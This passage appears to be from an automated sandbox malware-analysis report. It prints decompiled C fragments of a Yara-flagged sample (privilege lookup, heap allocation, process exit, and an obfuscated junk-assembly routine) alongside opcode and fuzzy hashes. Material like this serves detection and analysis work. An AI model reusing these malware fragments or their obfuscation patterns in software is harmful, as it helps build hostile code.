                                                                              • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 3c7b59bb92cd6b367a20bf088987b4b6c3345a20f53722230445991aabc67e08
                                                                              • Instruction ID: e0bd7550836f63ed215aa82201fbf28079057d129d88497f49e6d8f7befc4c46
                                                                              • Opcode Fuzzy Hash: 3c7b59bb92cd6b367a20bf088987b4b6c3345a20f53722230445991aabc67e08
                                                                              • Instruction Fuzzy Hash: 9AE092712102146BD718EF58EC85EE777A9EF89764F108A49FE0D5B241C930ED118AE0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E00418611(void* __eax, void* __ebx, void* __ecx, signed int __edi, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t14;

				asm("les edx, [ebx-0x29b0d21d]");
				asm("lodsd");
				asm("pushfd");
				 *(__ebx - 0x74aa04c4) =  *(__ebx - 0x74aa04c4) & __edi;
				_t11 = _v0;
				E00418DB0(__edi, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t14;
			}





                                                                              0x00418611
                                                                              0x00418617
                                                                              0x00418619
                                                                              0x0041861c
                                                                              0x00418623
                                                                              0x0041863a
                                                                              0x00418650
                                                                              0x00418654

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: 4b49e43f48961f35738517ac2e599b414f583d23ca9c9de1c7edbf935a67b0cc
                                                                              • Instruction ID: 58228a238782b9b3764d277eba2e113db830a1d013cdae8c0cb904c5590fb8ad
                                                                              • Opcode Fuzzy Hash: 4b49e43f48961f35738517ac2e599b414f583d23ca9c9de1c7edbf935a67b0cc
                                                                              • Instruction Fuzzy Hash: D6F039B1600204AFDB14DF55CC85EEB37A9EF99310F1181A9F90D9B282DA35A8168BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                              0x004184cf
                                                                              0x004184d7
                                                                              0x004184ed
                                                                              0x004184f1

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                              • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                              • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                              0x00418497
                                                                              0x004184ad
                                                                              0x004184b1

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                              • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                              • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                              0x0041863a
                                                                              0x00418650
                                                                              0x00418654

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                              • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                              • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                              0x00418503
                                                                              0x0041851a
                                                                              0x00418528

                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                              • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                              • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A4967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                              • Instruction ID: 3611c612406d18cddccccd86054bbce9a335fcd3a835415094ae52f60009255c
                                                                              • Opcode Fuzzy Hash: 641cc91c87e20a9ccc0cefa3d879ddb8fc96f819e66783b39896d707d130bf44
                                                                              • Instruction Fuzzy Hash: 40B09B719424C5C6D711D77046087177900B7D0741F17C065D1020641A4778C4D5F5B6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 0041563B, Relevance: .1, Instructions: 115COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 47%
                                                                              			E0041563B(void* __eax, intOrPtr __ebx, void* __ecx, intOrPtr* __edx, intOrPtr _a17, intOrPtr _a21, intOrPtr _a25) {
				signed int _t19;
				void* _t25;
				signed int _t26;
				signed int _t29;
				void* _t31;
				void* _t36;
				void* _t40;
				char _t44;
				void* _t54;
				void* _t64;
				intOrPtr _t65;

				_t39 = __ecx;
				_t33 = __ebx;
				_t53 = 0x15b678a5;
				asm("insd");
				_t19 = __eax + 1;
				 *__edx =  *__edx - __ebx;
				_t48 = 0xbf72d3c0;
				asm("out 0x60, al");
				_push(_t64);
				asm("adc eax, 0xf78ac656");
				_t65 = _t64 - 1;
				_pop(es);
				asm("lodsb");
				if( *__edx == 0) {
					L6:
					_t54 = _t53 - 1;
					 *_t19 =  *_t19 + _t19;
					if(_t19 != 0) {
						goto L4;
					} else {
						_t14 = _t48 + 0x3e6b; // 0xbf73122b
						if(E0041A4F0(_t39, _t33, _t14, _t54) != 0) {
							goto L4;
						} else {
							_t15 = _t48 + 0x3e72; // 0xbf731232
							if(E0041A4F0(_t39, _t33, _t15, _t54) != 0) {
								goto L4;
							} else {
								_push(_t54);
								_t16 = _t48 + 0x3e79; // 0xbf731239
								_t40 = _t16;
								_push(_t40);
								_push(_t33);
								if(E0041A4F0(_t40) != 0) {
									goto L4;
								} else {
									_t17 = _t48 + 0x3e81; // 0xbf731241
									_t25 = E0041A4F0(_t40, _t33, _t17, _t54);
									if(_t25 != 0) {
										goto L4;
									} else {
										_t26 = E0041A4F0(_t40, _t33, _t48 + 0x3e8a, _t54);
										asm("sbb eax, eax");
										return  ~( ~_t26);
									}
								}
							}
						}
					}
				} else {
					asm("adc [edi], dl");
					_t36 = __ebx - _t19;
					asm("cdq");
					asm("wait");
					 *((intOrPtr*)(__edx + 0x54ce0d4e)) = _t65;
					_pop(_t44);
					_t29 = _t19;
					_pop(es);
					_t2 = __ecx - 0x2e;
					 *_t2 =  *(__ecx - 0x2e) | 0x00001d84;
					asm("adc al, 0xb4");
					asm("out 0x19, al");
					 *0x6DBE9D47 = _t44;
					if( *_t2 >= 0) {
						_push(_t36);
						_t33 = _a21;
						_push(0x15b678a5);
						_push(0xbf72d3c0);
						_t48 = _a17;
						_t53 = _a25 + 0xfffffffe;
						_t31 = E0041A4F0(__ecx, _t33, _t48 + 0x3e5e, _t53);
						_t65 = _t65 + 0xc;
						if(_t31 == 0) {
							_t39 = _t48 + 0x3e64;
							_t19 = E0041A4F0(_t48 + 0x3e64, _t33, _t48 + 0x3e64, _t53);
							goto L6;
						} else {
							L4:
							return 1;
						}
					} else {
						asm("lock pop ebp");
						asm("outsb");
						return _t29 *  *5;
					}
				}
			}














                                                                              0x0041563b
                                                                              0x0041563b
                                                                              0x0041563c
                                                                              0x00415641
                                                                              0x00415642
                                                                              0x00415643
                                                                              0x00415645
                                                                              0x0041564a
                                                                              0x0041564c
                                                                              0x0041564e
                                                                              0x00415653
                                                                              0x00415654
                                                                              0x00415655
                                                                              0x00415656
                                                                              0x004156cc
                                                                              0x004156cc
                                                                              0x004156cd
                                                                              0x004156d4
                                                                              0x00000000
                                                                              0x004156d6
                                                                              0x004156d7
                                                                              0x004156e9
                                                                              0x00000000
                                                                              0x004156eb
                                                                              0x004156ec
                                                                              0x004156fe
                                                                              0x00000000
                                                                              0x00415700
                                                                              0x00415700
                                                                              0x00415701
                                                                              0x00415701
                                                                              0x00415707
                                                                              0x00415708
                                                                              0x00415713
                                                                              0x00000000
                                                                              0x00415715
                                                                              0x00415716
                                                                              0x0041571e
                                                                              0x00415728
                                                                              0x00000000
                                                                              0x0041572a
                                                                              0x00415733
                                                                              0x0041573e
                                                                              0x00415745
                                                                              0x00415745
                                                                              0x00415728
                                                                              0x00415713
                                                                              0x004156fe
                                                                              0x004156e9
                                                                              0x00415658
                                                                              0x00415658
                                                                              0x0041565a
                                                                              0x0041565c
                                                                              0x0041565e
                                                                              0x0041565f
                                                                              0x00415665
                                                                              0x00415666
                                                                              0x00415667
                                                                              0x00415668
                                                                              0x00415668
                                                                              0x0041566e
                                                                              0x00415670
                                                                              0x00415673
                                                                              0x00415679
                                                                              0x00415693
                                                                              0x00415694
                                                                              0x00415697
                                                                              0x0041569b
                                                                              0x0041569c
                                                                              0x0041569f
                                                                              0x004156ab
                                                                              0x004156b0
                                                                              0x004156b5
                                                                              0x004156c2
                                                                              0x004156ca
                                                                              0x00000000
                                                                              0x004156b7
                                                                              0x004156b7
                                                                              0x004156c0
                                                                              0x004156c0
                                                                              0x0041567b
                                                                              0x0041567b
                                                                              0x0041567f
                                                                              0x0041568e
                                                                              0x0041568e
                                                                              0x00415679

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1b2669a5a9dfb542dca5d42c2ea4b15cb8aed8df01584b0957a6ff88d4fdd388
                                                                              • Instruction ID: e918600535758e5ce0fbe2fca3a91d9c0eb22ab92b0a03aa3c091e480a0438dc
                                                                              • Opcode Fuzzy Hash: 1b2669a5a9dfb542dca5d42c2ea4b15cb8aed8df01584b0957a6ff88d4fdd388
                                                                              • Instruction Fuzzy Hash: 4A212B73A026556AD6004635FC419F7B35CDFE122CB481257FC0DC2243F66AE6A486ED
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00406A9C, Relevance: .0, Instructions: 15COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec7946d5f6691051f80e2ff6cd3d2a7c4b46d5d4b4849b2f51272910bd69bda0
                                                                              • Instruction ID: 372b912e5a3c30a65e92bb537b5dde9eea3d34e89ef6cd715555c0b15d8a138e
                                                                              • Opcode Fuzzy Hash: ec7946d5f6691051f80e2ff6cd3d2a7c4b46d5d4b4849b2f51272910bd69bda0
                                                                              • Instruction Fuzzy Hash: 7EC09B33E7500946E520DC2DB4816F4F3E4D767178F103357E804E3544D557D451054D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A498A0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                                                                              • Instruction ID: 46278940e38c78cc032eded5860e3122ad04eb904f6cfedb6947099d73470fa8
                                                                              • Opcode Fuzzy Hash: 996540c79dd47a1884f500e307987ce09dbc2a04afe2c35bb931407cd7c8723f
                                                                              • Instruction Fuzzy Hash: 0690026130100403D213616944146060009E7D1386F91C022E5414555D86758997F172
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49820, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                                                                              • Instruction ID: ceb868cc9e9df72b09cb739356477f8b24d0a15ff353318d04c7ca4381bcd75d
                                                                              • Opcode Fuzzy Hash: fbb17eaf313eb2b73101d6ba1105f01c8d82937820c3702461aa83fe002d9eb6
                                                                              • Instruction Fuzzy Hash: 1690027124100403D252716944046060009F7D0382F91C022A4414554E86A58A9AFAA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A4B040, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                                                                              • Instruction ID: ebd74727f9968b65acdb243d83b3c118fa4e5621fef973a144f97fa76ef665c3
                                                                              • Opcode Fuzzy Hash: 2b5f1a4bdc502f07fb262b51d0b98e1a7b28bc2adb540233d5cb6daa67bf9233
                                                                              • Instruction Fuzzy Hash: 709002A1601140434651B16948044065015F7E1342391C131A4444560C86B88899E2A5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A499D0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 20840e138c7fafce1bab3f81ce9e169c881055d8408c36295180227099d2276b
                                                                              • Instruction ID: c951432fe5c4058c153db097a039c966a56ed862fb3ac2b22d6b3806fec45679
                                                                              • Opcode Fuzzy Hash: 20840e138c7fafce1bab3f81ce9e169c881055d8408c36295180227099d2276b
                                                                              • Instruction Fuzzy Hash: 069002A121100043D215616944047060045E7E1342F51C022A6144554CC5798CA5A165
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49950, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cf059bafb56d0324806d2a47806a0aa01a0a0b7e611f70b1dc0cd1e04acca876
                                                                              • Instruction ID: d2085487a3ec68fd569bb16c1c296a41458a7b96445308001ec600eac6f1d6fb
                                                                              • Opcode Fuzzy Hash: cf059bafb56d0324806d2a47806a0aa01a0a0b7e611f70b1dc0cd1e04acca876
                                                                              • Instruction Fuzzy Hash: 5D9002A120140403D251656948046070005E7D0343F51C021A6054555E8A798C95B175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49A80, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c5cfecead7238c6bcb2febcf4acf2c762445969075f04d5ca4660cd06bbf5d60
                                                                              • Instruction ID: fb4873722bc49e1438366c2fb09a5e83f317e2261090460bcff93e7900d04fa4
                                                                              • Opcode Fuzzy Hash: c5cfecead7238c6bcb2febcf4acf2c762445969075f04d5ca4660cd06bbf5d60
                                                                              • Instruction Fuzzy Hash: F890026120144443D25162694804B0F4105E7E1343F91C029A8146554CC9658899A761
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49A10, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b4e0120119ced6e23e3d0bc5b3e0898fbca38d2d3c696c5353e43c658fc4a7f
                                                                              • Instruction ID: 78729c7e456cedafee4e02f6214a96a7b87f8a13df7603f43e31fac003ec9e52
                                                                              • Opcode Fuzzy Hash: 7b4e0120119ced6e23e3d0bc5b3e0898fbca38d2d3c696c5353e43c658fc4a7f
                                                                              • Instruction Fuzzy Hash: 1C90027120140403D211616948087470005E7D0343F51C021A9154555E86B5C8D5B571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A4A3B0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 47dd9c4804e01f6535cf8dcd5c82f6fa51b31d33648736742d1feb5a2d37a24d
                                                                              • Instruction ID: 95c9fdbf52c786c238a7e98c2b2474a4f2ecf9d10e13456b8023b5e74b8376e0
                                                                              • Opcode Fuzzy Hash: 47dd9c4804e01f6535cf8dcd5c82f6fa51b31d33648736742d1feb5a2d37a24d
                                                                              • Instruction Fuzzy Hash: AF90027120144003D2517169844460B5005F7E0342F51C421E4415554C8665889AE261
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49B00, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                                                                              • Instruction ID: 7e059550ac9cd0fe813c07f0b143804b59d5fcd75d57b298bf6bf8d73168e75d
                                                                              • Opcode Fuzzy Hash: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                                                                              • Instruction Fuzzy Hash: A990026124100803D251716984147070006E7D0742F51C021A4014554D866689A9B6F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A495F0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                                                                              • Instruction ID: 0ec7667788d7ba64c09a9b01173b1ecc9dc5ca75eb6eaf9018ff1c73f168dbfa
                                                                              • Opcode Fuzzy Hash: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                                                                              • Instruction Fuzzy Hash: 7290027120100803D215616948046860005E7D0342F51C021AA014655E96B588D5B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49520, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d0480fad5e30daf3d15c5d6e1f4c72e403ea1bd0d58333702e60d23fa699916f
                                                                              • Instruction ID: a5fc4bb1b518889bab89f84e1e612e2986941a9bf6f034595627cb4dda520619
                                                                              • Opcode Fuzzy Hash: d0480fad5e30daf3d15c5d6e1f4c72e403ea1bd0d58333702e60d23fa699916f
                                                                              • Instruction Fuzzy Hash: 939002E1201140934611A2698404B0A4505E7E0342B51C026E5044560CC5758895E175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A4AD30, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 787b971ff77c527b5a5f2db7419fd161b68749aee97bfa10e7ca59924c17b607
                                                                              • Instruction ID: 819c523eb183b4270fa0ef3f8ecf62aa0718669270f079081d06a66eda950cd4
                                                                              • Opcode Fuzzy Hash: 787b971ff77c527b5a5f2db7419fd161b68749aee97bfa10e7ca59924c17b607
                                                                              • Instruction Fuzzy Hash: DD900271A05000139251716948146464006F7E0782B55C021A4504554C89A48A99A3E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49560, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9328a6dc6c9b0c951d1700fb511d4355f31e6113fac91ee3a2e548b80cc97051
                                                                              • Instruction ID: b2cf2bad8de600511bb8e3ac2253120b3fc335cf9e0d9c4fc996e297be029935
                                                                              • Opcode Fuzzy Hash: 9328a6dc6c9b0c951d1700fb511d4355f31e6113fac91ee3a2e548b80cc97051
                                                                              • Instruction Fuzzy Hash: DF900265221000030256A569060450B0445F7D6392391C025F5406590CC67188A9A361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A496D0, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: aefc6aa0047f3f46882052f4db6e6944d8d9f00e8b8def9c6cbcc7c03b8736c9
                                                                              • Instruction ID: 7f3b55cccd44b96df3ce2e803f6e84d46b45ed45473b8a6ecc22e5199adade46
                                                                              • Opcode Fuzzy Hash: aefc6aa0047f3f46882052f4db6e6944d8d9f00e8b8def9c6cbcc7c03b8736c9
                                                                              • Instruction Fuzzy Hash: 9090027120100843D21161694404B460005E7E0342F51C026A4114654D8665C895B561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49610, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 55c7572007fa60db98f08a96a87e0755345136ce421ac9cb179c162a5bc04f8e
                                                                              • Instruction ID: 1969d06d9d3496e0f36f492f63f6003c2adf6d4670c5dcff35c34a0a6a726f3d
                                                                              • Opcode Fuzzy Hash: 55c7572007fa60db98f08a96a87e0755345136ce421ac9cb179c162a5bc04f8e
                                                                              • Instruction Fuzzy Hash: 7090027160500803D261716944147460005E7D0342F51C021A4014654D87A58A99B6E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00A49650, Relevance: .0, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.251888254.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
